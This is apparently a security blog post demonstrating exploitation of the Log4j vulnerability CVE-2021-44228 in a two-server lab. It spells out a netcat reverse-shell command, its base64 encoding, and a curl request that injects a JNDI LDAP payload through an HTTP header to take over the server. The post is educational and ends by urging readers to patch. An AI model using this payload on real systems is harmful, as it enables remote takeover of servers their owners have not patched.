Log4j Demonstration

Researcher: {Alan Ho}

A critical vulnerability for Apache Log4j was discovered and published, it has a huge impact to countless servers.

There are already posts describing the details of the vulnerability (CVE-2021–44228), so we are just going to do a demonstration on how this vulnerability can be manipulated.

We have prepared two servers in AWS, one acts as the vulnerable server which is using exploitable log4j.

vulnerable server

Another server is running a malicious LDAP server and netcat listener for remote shell.

malicious ldap server

netcat listener

Since the malicious LDAP server can support base64 encoded commands

ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]

We prepare the command:

nc 3.86.225.135 4444 -e /bin/sh

and base64 encode it

base64 encode the remote shell command

So we have all the servers and command in place, we launch the attack.

curl 52.23.211.253:8080 -H 'X-Api-Version: ${jndi:ldap://3.86.225.135:1389/Basic/Command/Base64/bmMgMy44Ni4yMjUuMTM1IDQ0NDQgLWUgL2Jpbi9zaA==}' 

launching the attack

The vulnerable server encountered the errors.

errors the vulnerable server

The malicious LDAP server received the command and the vulnerable server is owned.

received the command

Profit! the server is owned.

Video demonstration:

From the simple demonstration, as long as the malicious ldap server is setup, it is easy to launch the attack and own the server.

ref: https://www.lunasec.io/docs/blog/log4j-zero-day/

Please check your applications and update to the version which has fixed the issue.

References:

GitHub - christophetd/log4shell-vulnerable-app: Spring Boot web application vulnerable to…

Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package | LunaSec

GitHub - feihong-cs/JNDIExploit: A malicious LDAP server for JNDI injection attacks